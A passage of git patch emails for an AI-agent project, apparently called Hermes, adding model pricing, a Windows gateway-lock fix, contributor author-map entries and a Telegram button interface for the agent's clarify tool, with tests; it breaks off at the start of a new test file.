@@ -49,6 +49,7 @@ const sidebars: SidebarsConfig = {
           items: [
             'user-guide/features/tools',
             'user-guide/features/skills',
+            'user-guide/features/lsp',
             'user-guide/features/curator',
             'user-guide/features/memory',
             'user-guide/features/memory-providers',

From 88ede807c4cab7c2235b4e205cb7ba3521ac1117 Mon Sep 17 00:00:00 2001
From: zccyman <16263913+zccyman@users.noreply.github.com>
Date: Tue, 12 May 2026 15:04:18 -0700
Subject: [PATCH 30/59] fix(pricing): add deepseek-v4-pro to official docs
 pricing table

deepseek-v4-pro has been routable since v0.12 but was missing from
the _OFFICIAL_DOCS_PRICING table. Sessions using this model showed
as "unknown cost" in hermes insights instead of a dollar estimate.

Add pricing entry using published list prices:
- input: \$1.74/M tokens
- output: \$3.48/M tokens
- cache_read: \$0.0145/M tokens

Uses standard list rates (not the 75% promo) so estimates remain
accurate after promo expires 2026-05-31.

Closes #24218
---
 agent/usage_pricing.py            | 11 ++++++++++
 tests/agent/test_usage_pricing.py | 34 +++++++++++++++++++++++++++++++
 2 files changed, 45 insertions(+)

diff --git a/agent/usage_pricing.py b/agent/usage_pricing.py
index 467b72931c2..fcf4f622834 100644
--- a/agent/usage_pricing.py
+++ b/agent/usage_pricing.py
@@ -370,6 +370,17 @@ _OFFICIAL_DOCS_PRICING: Dict[tuple[str, str], PricingEntry] = {
         source_url="https://api-docs.deepseek.com/quick_start/pricing",
         pricing_version="deepseek-pricing-2026-03-16",
     ),
+    (
+        "deepseek",
+        "deepseek-v4-pro",
+    ): PricingEntry(
+        input_cost_per_million=Decimal("1.74"),
+        output_cost_per_million=Decimal("3.48"),
+        cache_read_cost_per_million=Decimal("0.0145"),
+        source="official_docs_snapshot",
+        source_url="https://api-docs.deepseek.com/quick_start/pricing",
+        pricing_version="deepseek-pricing-2026-05-12",
+    ),
     # Google Gemini
     (
         "google",
diff --git a/tests/agent/test_usage_pricing.py b/tests/agent/test_usage_pricing.py
index 5daace97dea..5c84b124a2e 100644
--- a/tests/agent/test_usage_pricing.py
+++ b/tests/agent/test_usage_pricing.py
@@ -190,3 +190,37 @@ def test_custom_endpoint_models_api_pricing_is_supported(monkeypatch):
 
     assert float(entry.input_cost_per_million) == 0.5
     assert float(entry.output_cost_per_million) == 2.0
+
+
+def test_deepseek_v4_pro_pricing_entry_exists():
+    """Regression test: deepseek-v4-pro must have a pricing entry.
+
+    Before this fix, deepseek-v4-pro sessions showed as unknown cost
+    in hermes insights because the _OFFICIAL_DOCS_PRICING table had no
+    entry for that model.  See #24218.
+    """
+    entry = get_pricing_entry(
+        "deepseek-v4-pro",
+        provider="deepseek",
+    )
+
+    assert entry is not None
+    assert entry.input_cost_per_million is not None
+    assert entry.output_cost_per_million is not None
+    assert float(entry.input_cost_per_million) == 1.74
+    assert float(entry.output_cost_per_million) == 3.48
+    assert float(entry.cache_read_cost_per_million) == 0.0145
+
+
+def test_deepseek_v4_pro_estimate_usage_cost():
+    """Ensure deepseek-v4-pro sessions get a dollar estimate, not unknown."""
+    result = estimate_usage_cost(
+        "deepseek-v4-pro",
+        CanonicalUsage(input_tokens=1000000, output_tokens=500000),
+        provider="deepseek",
+    )
+
+    assert result.status == "estimated"
+    assert result.amount_usd is not None
+    # 1M input × $1.74/M + 500K output × $3.48/M = $1.74 + $1.74 = $3.48
+    assert float(result.amount_usd) == 3.48

From 24e2151cd696e07d4edc490c75fd14c36da43fff Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 15:04:37 -0700
Subject: [PATCH 31/59] chore(release): add AUTHOR_MAP entries for zccyman and
 Osraka

---
 scripts/release.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/scripts/release.py b/scripts/release.py
index 3a1a5c143cd..c4cd0edaa21 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -140,6 +140,9 @@ AUTHOR_MAP = {
     "leon@agentlinker.ai": "agentlinker",
     "santoshhumagain1887@gmail.com": "npmisantosh",
     "39641663+luarss@users.noreply.github.com": "luarss",
+    "16263913+zccyman@users.noreply.github.com": "zccyman",
+    "ahmetosrak@Ahmet-MacBook-Air.local": "Osraka",
+    "98612432+Osraka@users.noreply.github.com": "Osraka",
     "novax635@gmail.com": "novax635",
     "krionex1@gmail.com": "Krionex",
     "rxdxxxx@users.noreply.github.com": "rxdxxxx",

From f9559c39c4ee7cc7c40f79efb37a6530b2bf0e0e Mon Sep 17 00:00:00 2001
From: EloquentBrush <147827411+EloquentBrush@users.noreply.github.com>
Date: Wed, 13 May 2026 02:15:57 +0300
Subject: [PATCH 32/59] fix(gateway): consult lock record argv when cmdline
 unreadable in scoped-lock stale check
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

PR #24500 introduced stale-lock detection that calls
`_looks_like_gateway_process` to confirm a running PID is not an
unrelated process that reused the slot.  On Windows neither `/proc`
nor `ps` is available, so `_read_process_cmdline` always returns
`None` and `_looks_like_gateway_process` always returns `False` —
causing every valid Windows gateway lock to be marked stale and
immediately evicted.

Fix: after `_looks_like_gateway_process` returns `False`, call
`_read_process_cmdline` directly.  If the result is non-`None` the
live cmdline was readable and confirms the PID is foreign → stale.
If it is `None` (cmdline unreadable, e.g. Windows without ps), fall
back to `_record_looks_like_gateway` which validates the stored
`argv` the gateway wrote into the lock file at startup.  Both
oracles must say "not a gateway" before the lock is evicted — the
same two-oracle pattern already used in `get_running_pid` (line 941).

Adds a regression test that simulates a Windows host where
`_looks_like_gateway_process` returns `False` for every PID and
`_read_process_cmdline` returns `None`, confirming the lock is kept
when the record's argv identifies it as a gateway process.
---
 gateway/status.py            | 11 ++++++++---
 tests/gateway/test_status.py | 34 ++++++++++++++++++++++++++++++++++
 2 files changed, 42 insertions(+), 3 deletions(-)

diff --git a/gateway/status.py b/gateway/status.py
index 0cc8abddb47..3c619856025 100644
--- a/gateway/status.py
+++ b/gateway/status.py
@@ -613,15 +613,20 @@ def acquire_scoped_lock(scope: str, identity: str, metadata: Optional[dict[str,
                     stale = True
                 # When start_time comparison is unavailable (macOS / Windows
                 # have no /proc, so both sides are None), fall back to
-                # checking the live process command line.  If the PID was
-                # reused by an unrelated process the lock is stale.
+                # checking the live process command line.  When cmdline is
+                # also unreadable (Windows has no ps), consult the lock
+                # record's own argv — the gateway writes it at startup and
+                # it's the only identity signal on platforms without ps.
+                # Both oracles must indicate "not a gateway" to mark stale.
                 if (
                     not stale
                     and existing.get("start_time") is None
                     and current_start is None
                     and not _looks_like_gateway_process(existing_pid)
                 ):
-                    stale = True
+                    live_cmdline = _read_process_cmdline(existing_pid)
+                    if live_cmdline is not None or not _record_looks_like_gateway(existing):
+                        stale = True
                 # Check if process is stopped (Ctrl+Z / SIGTSTP) — stopped
                 # processes still appear alive to _pid_exists but are not
                 # actually running. Treat them as stale so --replace works.
diff --git a/tests/gateway/test_status.py b/tests/gateway/test_status.py
index 91a52104ded..b92c0cd4d11 100644
--- a/tests/gateway/test_status.py
+++ b/tests/gateway/test_status.py
@@ -468,6 +468,9 @@ class TestScopedLocks:
         monkeypatch.setattr(status, "_pid_exists", lambda pid: True)
         monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
         monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: False)
+        # On macOS ``ps`` is available, so _read_process_cmdline returns the
+        # unrelated process's name.  This confirms the PID was reused.
+        monkeypatch.setattr(status, "_read_process_cmdline", lambda pid: "/usr/libexec/bluetoothuserd")
 
         acquired, existing = status.acquire_scoped_lock("telegram-bot-token", "secret", metadata={"platform": "telegram"})
 
@@ -476,6 +479,37 @@ class TestScopedLocks:
         assert payload["pid"] == os.getpid()
         assert payload["metadata"]["platform"] == "telegram"
 
+    def test_acquire_scoped_lock_keeps_lock_when_cmdline_unreadable_but_record_is_gateway(self, tmp_path, monkeypatch):
+        """Windows regression: ps unavailable so cmdline cannot be read.
+
+        When start_time is None on both sides and _looks_like_gateway_process
+        returns False because ps is missing (not because the PID belongs to an
+        unrelated process), the stale check must not delete a valid gateway
+        lock.  Fall back to the lock record's own argv — written by the
+        gateway at startup — before declaring the lock stale.
+        """
+        monkeypatch.setenv("HERMES_GATEWAY_LOCK_DIR", str(tmp_path / "locks"))
+        lock_path = tmp_path / "locks" / "telegram-bot-token-2bb80d537b1da3e3.lock"
+        lock_path.parent.mkdir(parents=True, exist_ok=True)
+        lock_path.write_text(json.dumps({
+            "pid": 99999,
+            "start_time": None,
+            "kind": "hermes-gateway",
+            "argv": ["hermes_cli/main.py", "gateway", "run"],
+        }))
+
+        monkeypatch.setattr(status, "_pid_exists", lambda pid: True)
+        monkeypatch.setattr(status, "_get_process_start_time", lambda pid: None)
+        # Windows: ps not available, so _read_process_cmdline returns None
+        # and _looks_like_gateway_process returns False for every process.
+        monkeypatch.setattr(status, "_looks_like_gateway_process", lambda pid: False)
+        monkeypatch.setattr(status, "_read_process_cmdline", lambda pid: None)
+
+        acquired, existing = status.acquire_scoped_lock("telegram-bot-token", "secret", metadata={"platform": "telegram"})
+
+        assert acquired is False
+        assert existing["pid"] == 99999
+
     def test_acquire_scoped_lock_keeps_lock_when_pid_reused_by_gateway(self, tmp_path, monkeypatch):
         """When start_time is None but the live PID still looks like a gateway, keep the lock."""
         monkeypatch.setenv("HERMES_GATEWAY_LOCK_DIR", str(tmp_path / "locks"))

From 76bbb94be43cffb8449edae28f5ea1826661026b Mon Sep 17 00:00:00 2001
From: teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:32:44 -0700
Subject: [PATCH 33/59] chore: AUTHOR_MAP entry for AhmetArif0 (PR #24600)

---
 scripts/release.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/scripts/release.py b/scripts/release.py
index c4cd0edaa21..10a8918681f 100755
--- a/scripts/release.py
+++ b/scripts/release.py
@@ -61,6 +61,7 @@ AUTHOR_MAP = {
     "treydong.zh@gmail.com": "TreyDong",
     "kyanam.preetham@gmail.com": "pkyanam",
     "127238744+teknium1@users.noreply.github.com": "teknium1",
+    "147827411+EloquentBrush@users.noreply.github.com": "AhmetArif0",
     "hugosequier@gmail.com": "Hugo-SEQUIER",
     "128259593+Gutslabs@users.noreply.github.com": "Gutslabs",
     "50326054+nocturnum91@users.noreply.github.com": "nocturnum91",

From 29d7c244c5d55230e838c049afb13d307168679c Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 16:33:33 -0700
Subject: [PATCH 34/59] feat(gateway): wire clarify tool with inline keyboard
 buttons on Telegram (#24199)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The clarify tool returned 'not available in this execution context' for
every gateway-mode agent because gateway/run.py never passed
clarify_callback into the AIAgent constructor. Schema actively encouraged
calling it; users never saw the question.

Changes:

- tools/clarify_gateway.py — new event-based primitive mirroring
  tools/approval.py: register/wait_for_response/resolve_gateway_clarify
  with per-session FIFO, threading.Event blocking with 1s heartbeat
  slices (so the inactivity watchdog keeps ticking), and
  clear_session for boundary cleanup.

- gateway/platforms/base.py — abstract send_clarify with a numbered-text
  fallback so every adapter (Discord, Slack, WhatsApp, Signal, Matrix,
  etc.) gets a working clarify out of the box. Plus an active-session
  bypass: when the agent is blocked on a text-awaiting clarify, the next
  non-command message routes inline to the runner's intercept instead
  of being queued + triggering an interrupt. Same shape as the /approve
  deadlock fix from PR #4926.

- gateway/platforms/telegram.py — concrete send_clarify renders one
  inline button per choice plus '✏️ Other (type answer)'. cl: callback
  handler resolves numeric choices immediately, flips to text-capture
  mode for Other, with the same authorization guards as exec/slash
  approvals.

- gateway/run.py — clarify_callback wired at the cached-agent per-turn
  callback assignment site (only the user-facing agent path; cron and
  hygiene-compress agents have no human attached). Bridges sync→async
  via run_coroutine_threadsafe, blocks with the configured timeout, and
  returns a '[user did not respond within Xm]' sentinel on timeout so
  the agent adapts rather than pinning the running-agent guard. Text-
  intercept added to _handle_message before slash-confirm intercept
  (skipping slash commands). clear_session called in the run's finally
  to cancel any orphan entries.

- hermes_cli/config.py — agent.clarify_timeout default 600s.

- website/docs/user-guide/messaging/telegram.md — Interactive Prompts
  section.

Tests:

- tests/tools/test_clarify_gateway.py (14 tests) — full primitive
  coverage: button resolve, open-ended auto-await, Other flip, timeout
  None, unknown-id idempotency, clear_session cancellation, FIFO
  ordering, register/unregister notify, config default.

- tests/gateway/test_telegram_clarify_buttons.py (12 tests) — render
  paths (multi-choice/open-ended/long-label/HTML-escape/not-connected),
  callback dispatch (numeric resolve/Other flip/already-resolved/
  unauthorized/invalid-token), and base-adapter text fallback.

Out of scope: bot-to-bot, guest mode, checklists, poll media, live
photos. Closes #24191.
---
 gateway/platforms/base.py                     | 101 ++++
 gateway/platforms/telegram.py                 | 182 +++++++
 gateway/run.py                                | 109 +++++
 hermes_cli/config.py                          |   6 +
 .../gateway/test_telegram_clarify_buttons.py  | 451 ++++++++++++++++++
 tests/tools/test_clarify_gateway.py           | 207 ++++++++
 tools/clarify_gateway.py                      | 278 +++++++++++
 website/docs/user-guide/messaging/telegram.md |  13 +
 8 files changed, 1347 insertions(+)
 create mode 100644 tests/gateway/test_telegram_clarify_buttons.py
 create mode 100644 tests/tools/test_clarify_gateway.py
 create mode 100644 tools/clarify_gateway.py

diff --git a/gateway/platforms/base.py b/gateway/platforms/base.py
index ec0323d4738..7026b55cf1b 100644
--- a/gateway/platforms/base.py
+++ b/gateway/platforms/base.py
@@ -1743,6 +1743,55 @@ class BasePlatformAdapter(ABC):
         """
         return SendResult(success=False, error="Not supported")
 
+    async def send_clarify(
+        self,
+        chat_id: str,
+        question: str,
+        choices: Optional[list],
+        clarify_id: str,
+        session_key: str,
+        metadata: Optional[Dict[str, Any]] = None,
+    ) -> SendResult:
+        """Send a clarify prompt to the user.
+
+        Two render modes:
+
+          * **Multiple choice** (``choices`` is a non-empty list) — adapters
+            that override this should render inline buttons (one per choice
+            plus a final "Other" / free-text option).  Button callbacks
+            MUST resolve via
+            ``tools.clarify_gateway.resolve_gateway_clarify(clarify_id, response)``
+            with the chosen string.  Picking the "Other" button calls
+            ``mark_awaiting_text(clarify_id)`` so the next message in the
+            session is captured as the response.
+
+          * **Open-ended** (``choices`` is None or empty) — render the
+            question as a plain text message; the next user message in the
+            session is captured by the gateway's text-intercept and
+            resolves the clarify automatically (see
+            ``GatewayRunner._maybe_intercept_clarify_text``).
+
+        The default implementation falls back to a numbered text list,
+        which works on every platform — the user replies with a number
+        ("2") or with the literal choice text, and the gateway intercepts
+        and resolves.  Adapters with native button UIs (Telegram, Discord)
+        SHOULD override this for a richer UX.
+        """
+        if choices:
+            lines = [f"❓ {question}", ""]
+            for i, choice in enumerate(choices, start=1):
+                lines.append(f"  {i}. {choice}")
+            lines.append("")
+            lines.append("Reply with the number, the option text, or your own answer.")
+            text = "\n".join(lines)
+        else:
+            text = f"❓ {question}"
+        return await self.send(
+            chat_id=chat_id,
+            content=text,
+            metadata=metadata,
+        )
+
     async def send_private_notice(
         self,
         chat_id: str,
@@ -2831,6 +2880,58 @@ class BasePlatformAdapter(ABC):
                     logger.error("[%s] Command '/%s' dispatch failed: %s", self.name, cmd, e, exc_info=True)
                 return
 
+            # Clarify text-capture bypass: if the agent is blocked on a
+            # clarify_tool call awaiting a free-form text response (open-
+            # ended clarify, or user picked "Other"), the next non-command
+            # message in this session MUST reach the runner so the
+            # clarify-intercept can resolve it and unblock the agent.
+            #
+            # Without this bypass: the message gets queued in
+            # _pending_messages AND triggers an interrupt, killing the
+            # agent run mid-clarify and discarding the user's answer.
+            # Same shape as the /approve deadlock fix (PR #4926) — both
+            # cases are "agent thread blocked on Event.wait, message must
+            # reach the resolver before being treated as a new turn."
+            if not cmd:
+                try:
+                    from tools import clarify_gateway as _clarify_mod
+                    _has_text_clarify = (
+                        _clarify_mod.get_pending_for_session(session_key) is not None
+                    )
+                except Exception:
+                    _has_text_clarify = False
+
+                if _has_text_clarify:
+                    logger.debug(
+                        "[%s] Routing message to clarify text-intercept for %s",
+                        self.name, session_key,
+                    )
+                    try:
+                        _thread_meta = _thread_metadata_for_source(
+                            event.source, _reply_anchor_for_event(event)
+                        )
+                        response = await self._message_handler(event)
+                        _text, _eph_ttl = self._unwrap_ephemeral(response)
+                        if _text:
+                            _r = await self._send_with_retry(
+                                chat_id=event.source.chat_id,
+                                content=_text,
+                                reply_to=_reply_anchor_for_event(event),
+                                metadata=_thread_meta,
+                            )
+                            if _eph_ttl > 0 and _r.success and _r.message_id:
+                                self._schedule_ephemeral_delete(
+                                    chat_id=event.source.chat_id,
+                                    message_id=_r.message_id,
+                                    ttl_seconds=_eph_ttl,
+                                )
+                    except Exception as e:
+                        logger.error(
+                            "[%s] Clarify text-intercept dispatch failed: %s",
+                            self.name, e, exc_info=True,
+                        )
+                    return
+
             if self._busy_session_handler is not None:
                 try:
                     if await self._busy_session_handler(event, session_key):
diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index e91a38ac6b1..a821160cfc8 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -427,6 +427,9 @@ class TelegramAdapter(BasePlatformAdapter):
         # Slash-confirm button state: confirm_id → session_key (for /reload-mcp
         # and any other slash-confirm prompts; see GatewayRunner._request_slash_confirm).
         self._slash_confirm_state: Dict[str, str] = {}
+        # Clarify button state: clarify_id → session_key (for the clarify tool's
+        # multiple-choice prompts; see GatewayRunner clarify_callback wiring).
+        self._clarify_state: Dict[str, str] = {}
         # Notification mode for message sends.
         # "important" — only final responses, approvals, and slash confirmations
         #               trigger notifications; tool progress, streaming, status
@@ -2215,6 +2218,80 @@ class TelegramAdapter(BasePlatformAdapter):
             logger.warning("[%s] send_slash_confirm failed: %s", self.name, e)
             return SendResult(success=False, error=str(e))
 
+    async def send_clarify(
+        self,
+        chat_id: str,
+        question: str,
+        choices: Optional[list],
+        clarify_id: str,
+        session_key: str,
+        metadata: Optional[Dict[str, Any]] = None,
+    ) -> SendResult:
+        """Render a clarify prompt with one inline button per choice.
+
+        Multi-choice mode (``choices`` non-empty): renders one button per
+        option plus a final "✏️ Other (type answer)" button.  Picking the
+        "Other" button flips the entry into text-capture mode so the next
+        message becomes the response.
+
+        Open-ended mode (``choices`` empty): renders the question as plain
+        text — no buttons.  The next message in the session is captured by
+        the gateway's text-intercept and resolves the clarify.
+        """
+        if not self._bot:
+            return SendResult(success=False, error="Not connected")
+
+        try:
+            text = f"❓ {_html.escape(question)}"
+            thread_id = self._metadata_thread_id(metadata)
+
+            kwargs: Dict[str, Any] = {
+                "chat_id": int(chat_id),
+                "text": text,
+                "parse_mode": ParseMode.HTML,
+                **self._link_preview_kwargs(),
+            }
+
+            if choices:
+                # Telegram caps callback_data at 64 bytes; keep "cl:<id>:<idx>"
+                # short.  Button label is also capped (~64 chars in practice).
+                rows = []
+                for idx, choice in enumerate(choices):
+                    label = str(choice)
+                    if len(label) > 60:
+                        label = label[:57] + "..."
+                    rows.append([
+                        InlineKeyboardButton(
+                            f"{idx + 1}. {label}",
+                            callback_data=f"cl:{clarify_id}:{idx}",
+                        )
+                    ])
+                rows.append([
+                    InlineKeyboardButton(
+                        "✏️ Other (type answer)",
+                        callback_data=f"cl:{clarify_id}:other",
+                    )
+                ])
+                kwargs["reply_markup"] = InlineKeyboardMarkup(rows)
+
+            reply_to_id = self._reply_to_message_id_for_send(None, metadata)
+            kwargs["reply_to_message_id"] = reply_to_id
+            kwargs.update(
+                self._thread_kwargs_for_send(
+                    chat_id,
+                    thread_id,
+                    metadata,
+                    reply_to_message_id=reply_to_id,
+                )
+            )
+
+            msg = await self._send_message_with_thread_fallback(**kwargs)
+            self._clarify_state[clarify_id] = session_key
+            return SendResult(success=True, message_id=str(msg.message_id))
+        except Exception as e:
+            logger.warning("[%s] send_clarify failed: %s", self.name, e)
+            return SendResult(success=False, error=str(e))
+
     async def send_model_picker(
         self,
         chat_id: str,
@@ -2700,6 +2777,111 @@ class TelegramAdapter(BasePlatformAdapter):
                     logger.error("[%s] slash-confirm callback failed: %s", self.name, exc, exc_info=True)
             return
 
+        # --- Clarify callbacks (cl:clarify_id:idx | cl:clarify_id:other) ---
+        if data.startswith("cl:"):
+            parts = data.split(":", 2)
+            if len(parts) == 3:
+                clarify_id = parts[1]
+                choice_token = parts[2]
+
+                caller_id = str(getattr(query.from_user, "id", ""))
+                if not self._is_callback_user_authorized(
+                    caller_id,
+                    chat_id=query_chat_id,
+                    chat_type=str(query_chat_type) if query_chat_type is not None else None,
+                    thread_id=str(query_thread_id) if query_thread_id is not None else None,
+                    user_name=query_user_name,
+                ):
+                    await query.answer(text="⛔ You are not authorized to answer this prompt.")
+                    return
+
+                session_key = self._clarify_state.get(clarify_id)
+                if not session_key:
+                    await query.answer(text="This prompt has already been resolved.")
+                    return
+
+                user_display = getattr(query.from_user, "first_name", "User")
+
+                if choice_token == "other":
+                    # Flip into text-capture mode and tell the user to type
+                    # their answer.  The gateway's text-intercept will pick
+                    # up the next message in this session and resolve the
+                    # clarify.  Do NOT pop _clarify_state yet — we still
+                    # need it if the user is slow to respond and the entry
+                    # is cleared by something else.
+                    try:
+                        from tools.clarify_gateway import mark_awaiting_text
+                        mark_awaiting_text(clarify_id)
+                    except Exception as exc:
+                        logger.warning("[%s] mark_awaiting_text failed: %s", self.name, exc)
+
+                    await query.answer(text="✏️ Type your answer in the chat.")
+                    try:
+                        await query.edit_message_text(
+                            text=f"❓ {query.message.text or ''}\n\n<i>Awaiting typed response from {_html.escape(user_display)}…</i>",
+                            parse_mode=ParseMode.HTML,
+                            reply_markup=None,
+                        )
+                    except Exception:
+                        pass
+                    return
+
+                # Numeric choice → resolve immediately with the chosen text
+                try:
+                    idx = int(choice_token)
+                except (ValueError, TypeError):
+                    await query.answer(text="Invalid choice.")
+                    return
+
+                # Look up the choice text from the entry registered in the
+                # clarify primitive.  Fall back to the index if the entry
+                # has been cleaned up (race with timeout / session reset).
+                resolved_text: Optional[str] = None
+                try:
+                    from tools.clarify_gateway import _entries as _clarify_entries  # type: ignore
+                    entry = _clarify_entries.get(clarify_id)
+                    if entry and entry.choices and 0 <= idx < len(entry.choices):
+                        resolved_text = entry.choices[idx]
+                except Exception:
+                    resolved_text = None
+
+                if resolved_text is None:
+                    # Race: entry vanished. Echo the index as a number so
+                    # the agent at least sees an intentional response
+                    # rather than nothing.
+                    resolved_text = f"choice {idx + 1}"
+
+                # Pop state and resolve
+                self._clarify_state.pop(clarify_id, None)
+                try:
+                    from tools.clarify_gateway import resolve_gateway_clarify
+                    resolved = resolve_gateway_clarify(clarify_id, resolved_text)
+                except Exception as exc:
+                    logger.error("[%s] resolve_gateway_clarify failed: %s", self.name, exc)
+                    resolved = False
+
+                await query.answer(text=f"✓ {resolved_text[:60]}")
+                try:
+                    await query.edit_message_text(
+                        text=f"❓ {_html.escape(query.message.text or '')}\n\n<b>{_html.escape(user_display)}:</b> {_html.escape(resolved_text)}",
+                        parse_mode=ParseMode.HTML,
+                        reply_markup=None,
+                    )
+                except Exception:
+                    pass
+
+                if resolved:
+                    logger.info(
+                        "Telegram clarify button resolved (id=%s, choice=%r, user=%s)",
+                        clarify_id, resolved_text, user_display,
+                    )
+                else:
+                    logger.warning(
+                        "Telegram clarify button: resolve_gateway_clarify returned False (id=%s)",
+                        clarify_id,
+                    )
+            return
+
         # --- Update prompt callbacks ---
         if not data.startswith("update_prompt:"):
             return
diff --git a/gateway/run.py b/gateway/run.py
index 559adae89bf..bda0cbf9831 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -5828,6 +5828,37 @@ class GatewayRunner:
                     )
                 _update_prompts.pop(_quick_key, None)
 
+        # Intercept messages that are responses to a pending clarify
+        # request that is awaiting free-form text (either an open-ended
+        # clarify with no choices, or one where the user picked the
+        # "Other" button).  The first non-empty user message in the
+        # session resolves the clarify and unblocks the agent thread —
+        # we do NOT route it to the agent as a new turn.
+        try:
+            from tools import clarify_gateway as _clarify_mod
+            _pending_clarify = _clarify_mod.get_pending_for_session(_quick_key)
+        except Exception:
+            _pending_clarify = None
+        if _pending_clarify is not None:
+            _raw_clarify_reply = (event.text or "").strip()
+            # Skip slash commands — the user clearly wanted to issue a
+            # command, not answer the clarify.  Leave the clarify pending
+            # so the user can retry; if it times out, the agent unblocks
+            # with an empty response.
+            if _raw_clarify_reply and not _raw_clarify_reply.startswith("/"):
+                _resolved = _clarify_mod.resolve_gateway_clarify(
+                    _pending_clarify.clarify_id, _raw_clarify_reply,
+                )
+                if _resolved:
+                    logger.info(
+                        "Gateway intercepted clarify text response (session=%s, id=%s)",
+                        _quick_key, _pending_clarify.clarify_id,
+                    )
+                    # Acknowledge with empty string so adapters that emit
+                    # the agent's response don't double-post.  The agent
+                    # itself will produce the next user-facing message.
+                    return ""
+
         # Intercept messages that are responses to a pending /reload-mcp
         # (or future) slash-confirm prompt.  Recognized confirm replies are
         # /approve, /always, /cancel (plus short aliases).  Anything else
@@ -14957,6 +14988,76 @@ class GatewayRunner:
                     if _pdc is not None:
                         _pdc[session_key] = _release_bg_review_messages
 
+            # ------------------------------------------------------------------
+            # Clarify callback: present a clarify prompt and block on a response.
+            #
+            # Runs on the agent's worker thread (see clarify_tool's synchronous
+            # callback contract).  Bridges sync→async by scheduling the
+            # adapter's send_clarify on the gateway event loop, then blocks on
+            # the clarify primitive's threading.Event with a configurable
+            # timeout.  Returns the user's response string, or a sentinel
+            # explaining that no response arrived (so the agent can adapt
+            # rather than hang forever).
+            # ------------------------------------------------------------------
+            def _clarify_callback_sync(question: str, choices) -> str:
+                from tools import clarify_gateway as _clarify_mod
+                import uuid as _uuid
+
+                if not _status_adapter:
+                    return ""
+
+                clarify_id = _uuid.uuid4().hex[:10]
+                _clarify_mod.register(
+                    clarify_id=clarify_id,
+                    session_key=session_key or "",
+                    question=question,
+                    choices=list(choices) if choices else None,
+                )
+
+                # Pause typing — like approval, we don't want a "thinking..."
+                # status to obscure the prompt or block the user from typing
+                # an "Other" response on platforms that disable input while
+                # typing is active (Slack Assistant API).
+                try:
+                    _status_adapter.pause_typing_for_chat(_status_chat_id)
+                except Exception:
+                    pass
+
+                send_ok = False
+                try:
+                    fut = asyncio.run_coroutine_threadsafe(
+                        _status_adapter.send_clarify(
+                            chat_id=_status_chat_id,
+                            question=question,
+                            choices=list(choices) if choices else None,
+                            clarify_id=clarify_id,
+                            session_key=session_key or "",
+                            metadata=_status_thread_metadata,
+                        ),
+                        _loop_for_step,
+                    )
+                    result = fut.result(timeout=15)
+                    send_ok = bool(getattr(result, "success", False))
+                except Exception as exc:
+                    logger.warning("Clarify send failed: %s", exc)
+                    send_ok = False
+
+                if not send_ok:
+                    # Couldn't deliver the prompt — clean up and return
+                    # sentinel so the agent can fall back to a sensible
+                    # default rather than hanging.
+                    _clarify_mod.clear_session(session_key or "")
+                    return "[clarify prompt could not be delivered]"
+
+                timeout = _clarify_mod.get_clarify_timeout()
+                response = _clarify_mod.wait_for_response(clarify_id, timeout=float(timeout))
+                if response is None or response == "":
+                    # Timeout or session-boundary cancellation
+                    return f"[user did not respond within {int(timeout / 60)}m]"
+                return response
+
+            agent.clarify_callback = _clarify_callback_sync
+
             # Store agent reference for interrupt support
             agent_holder[0] = agent
             # Capture the full tool definitions for transcript logging
@@ -15228,6 +15329,14 @@ class GatewayRunner:
                 result = agent.run_conversation(_run_message, conversation_history=agent_history, task_id=session_id)
             finally:
                 unregister_gateway_notify(_approval_session_key)
+                # Cancel any pending clarify entries so blocked agent
+                # threads don't hang past the end of the run (interrupt,
+                # completion, gateway shutdown).  Idempotent.
+                try:
+                    from tools.clarify_gateway import clear_session as _clear_clarify_session
+                    _clear_clarify_session(_approval_session_key)
+                except Exception:
+                    pass
                 reset_current_session_key(_approval_session_token)
             result_holder[0] = result
 
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index 038aca518fb..dc3e414948b 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -477,6 +477,12 @@ DEFAULT_CONFIG = {
         # threshold before escalating to a full timeout.  The warning fires
         # once per run and does not interrupt the agent.  0 = disable warning.
         "gateway_timeout_warning": 900,
+        # Maximum time (seconds) the gateway will block an agent waiting for
+        # a clarify-tool response from the user.  Hit this and the agent
+        # unblocks with "[user did not respond within Xm]" so it can adapt
+        # rather than pinning the running-agent guard forever.  CLI clarify
+        # blocks indefinitely (input() is synchronous) and ignores this.
+        "clarify_timeout": 600,
         # Periodic "still working" notification interval (seconds).
         # Sends a status message every N seconds so the user knows the
         # agent hasn't died during long tasks.  0 = disable notifications.
diff --git a/tests/gateway/test_telegram_clarify_buttons.py b/tests/gateway/test_telegram_clarify_buttons.py
new file mode 100644
index 00000000000..b9e7bd5130f
--- /dev/null
+++ b/tests/gateway/test_telegram_clarify_buttons.py
@@ -0,0 +1,451 @@
+"""Tests for Telegram inline keyboard clarify buttons.
+
+Mirrors test_telegram_approval_buttons.py for the new ``send_clarify`` and
+``cl:`` callback dispatch added in feat/clarify-gateway-buttons.
+"""
+
+import asyncio
+import os
+import sys
+from pathlib import Path
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+# ---------------------------------------------------------------------------
+# Ensure the repo root is importable
+# ---------------------------------------------------------------------------
+_repo = str(Path(__file__).resolve().parents[2])
+if _repo not in sys.path:
+    sys.path.insert(0, _repo)
+
+
+# ---------------------------------------------------------------------------
+# Minimal Telegram mock so TelegramAdapter can be imported (mirrors
+# test_telegram_approval_buttons.py)
+# ---------------------------------------------------------------------------
+def _ensure_telegram_mock():
+    if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
+        return
+
